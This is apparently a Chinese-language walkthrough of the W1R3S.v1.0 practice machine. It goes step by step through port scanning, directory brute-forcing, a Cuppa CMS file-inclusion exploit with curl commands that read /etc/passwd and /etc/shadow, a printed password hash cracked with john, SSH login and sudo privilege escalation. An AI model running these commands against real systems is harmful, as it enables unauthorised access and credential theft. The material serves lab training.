專案五w1r3s.v1.0

語言: CN / TW / HK

實戰記錄

1、nmap資訊列舉

1)C段掃描

nmap -sP 192.168.186.0/24

2)掃描全埠資訊

nmap -p- 192.168.186.143

3)掃描版本資訊

nmap -p- 192.168.186.143 -sS -sV -A -T5

有用的資訊:

2、目錄爆破

dirb http://192.168.186.143/

查找出該頁面存在administrator目錄:

http://192.168.186.143/administrator/installation/

發現是Title[Cuppa CMS]框架!CuppaCMS是一套內容管理系統(CMS)!

3、谷歌搜尋:Cuppa CMS exploit

https://www.exploit-db.com/exploits/25971

其實是個檔案包含漏洞,請求中的urlConfig的引數會當做程式碼執行(原來這種也能申請CVE,驚呆。。。)

LINE 22: 
        <?php include($_REQUEST["urlConfig"]); ?>

嘗試通過get拼接,無回顯,因此改用post方式,因為漏洞是

$_REQUEST,兩種方式都是接收的。

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.186.143/administrator/alerts/alertConfigField.php

發現存在正確回顯,說明驗證檔案包含漏洞成功

接下來就讀取shadow裡面的資訊,因為裡面有登陸的密碼

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.
168.186.143/administrator/alerts/alertConfigField.php

在回顯中找最長的,因為裡面是包含有密碼,比如說這個

w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

儲存下

使用john來暴力破解密碼,不加密碼本就是用的本地預設密碼本

使用者名稱:w1r3s

密碼:computer

然後進行ssh登陸目標主機

ssh [email protected]

然後繼續進行linux掃描,這裡用工具linpeas.sh,然後通過wget傳輸

控制端

目標端

執行掃描檔案

可利用的地方是橙色顯示,這裡發現可能可以通過sudo提權

根據提示使用sudo -l,發現許可權都是可以使用的

進一步使用sudo su去提權,發現成功了

獲取flag成功

擴充套件知識

1,定位問題函式

2,控制/etc/sudoers的最低許可權

腦圖